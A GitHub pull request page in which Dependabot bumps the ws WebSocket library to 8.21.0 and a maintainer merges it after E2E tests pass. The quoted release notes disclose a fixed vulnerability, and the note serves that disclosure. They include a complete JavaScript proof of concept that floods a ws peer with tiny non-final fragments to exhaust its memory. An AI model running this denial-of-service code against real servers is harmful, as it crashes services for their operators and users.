Skip to content

build(deps): bump ws from 8.19.0 to 8.21.0 in /src/store-front#352

Merged
pauldotyu merged 1 commit into
mainfrom
dependabot/npm_and_yarn/src/store-front/ws-8.21.0
Jun 7, 2026
Merged

build(deps): bump ws from 8.19.0 to 8.21.0 in /src/store-front#352
pauldotyu merged 1 commit into
mainfrom
dependabot/npm_and_yarn/src/store-front/ws-8.21.0

Conversation

@dependabot

@dependabot dependabot Bot commented on behalf of github May 29, 2026

Copy link
Copy Markdown
Contributor

Bumps ws from 8.19.0 to 8.21.0.

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

8.20.1

... (truncated)

Commits
  • bca91ad [dist] 8.21.0
  • 2b2abd4 [security] Limit retained message parts
  • 78eabe2 [security] Add latest vulnerability to SECURITY.md
  • 5d9b316 [dist] 8.20.1
  • c0327ec [security] Fix uninitialized memory disclosure in websocket.close()
  • ce2a3d6 [ci] Test on node 26
  • 58e45b8 [ci] Do not test on node 25
  • 5f26c24 [ci] Run the lint step on node 24
  • 8439255 [dist] 8.20.0
  • d3503c1 [minor] Export the PerMessageDeflate class and header utils
  • Additional commits viewable in compare view

Copilot AI review requested due to automatic review settings May 29, 2026 15:42
@dependabot dependabot Bot added dependencies Pull requests that update a dependency file javascript Pull requests that update Javascript code labels May 29, 2026

Copilot AI left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copilot encountered an error and was unable to review this pull request. You can try again by re-requesting a review.

@pauldotyu

Copy link
Copy Markdown
Contributor

@dependabot rebase

@dependabot dependabot Bot force-pushed the dependabot/npm_and_yarn/src/store-front/ws-8.21.0 branch from de1aba5 to 1867040 Compare June 7, 2026 14:27
@pauldotyu

Copy link
Copy Markdown
Contributor

/test-e2e

@github-actions

github-actions Bot commented Jun 7, 2026

Copy link
Copy Markdown

🚀 @pauldotyu Starting E2E tests...

Workflow Run: 27098261672
Environment: e2etest
Location: australiaeast

Bumps [ws](https://github.com/websockets/ws) from 8.19.0 to 8.21.0.
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.19.0...8.21.0)

---
updated-dependencies:
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot Bot force-pushed the dependabot/npm_and_yarn/src/store-front/ws-8.21.0 branch from 1867040 to b7ddf14 Compare June 7, 2026 16:30
@github-actions

github-actions Bot commented Jun 7, 2026

Copy link
Copy Markdown

@pauldotyu E2E tests completed successfully!

Workflow Run: 27098261672
Duration: ~26 minutes
Status: Passed
Environment: e2etest
Location: australiaeast

All tests passed and resources have been cleaned up.

@pauldotyu pauldotyu merged commit 4d1ab4b into main Jun 7, 2026
3 checks passed
@dependabot dependabot Bot deleted the dependabot/npm_and_yarn/src/store-front/ws-8.21.0 branch June 7, 2026 17:04
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file javascript Pull requests that update Javascript code

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants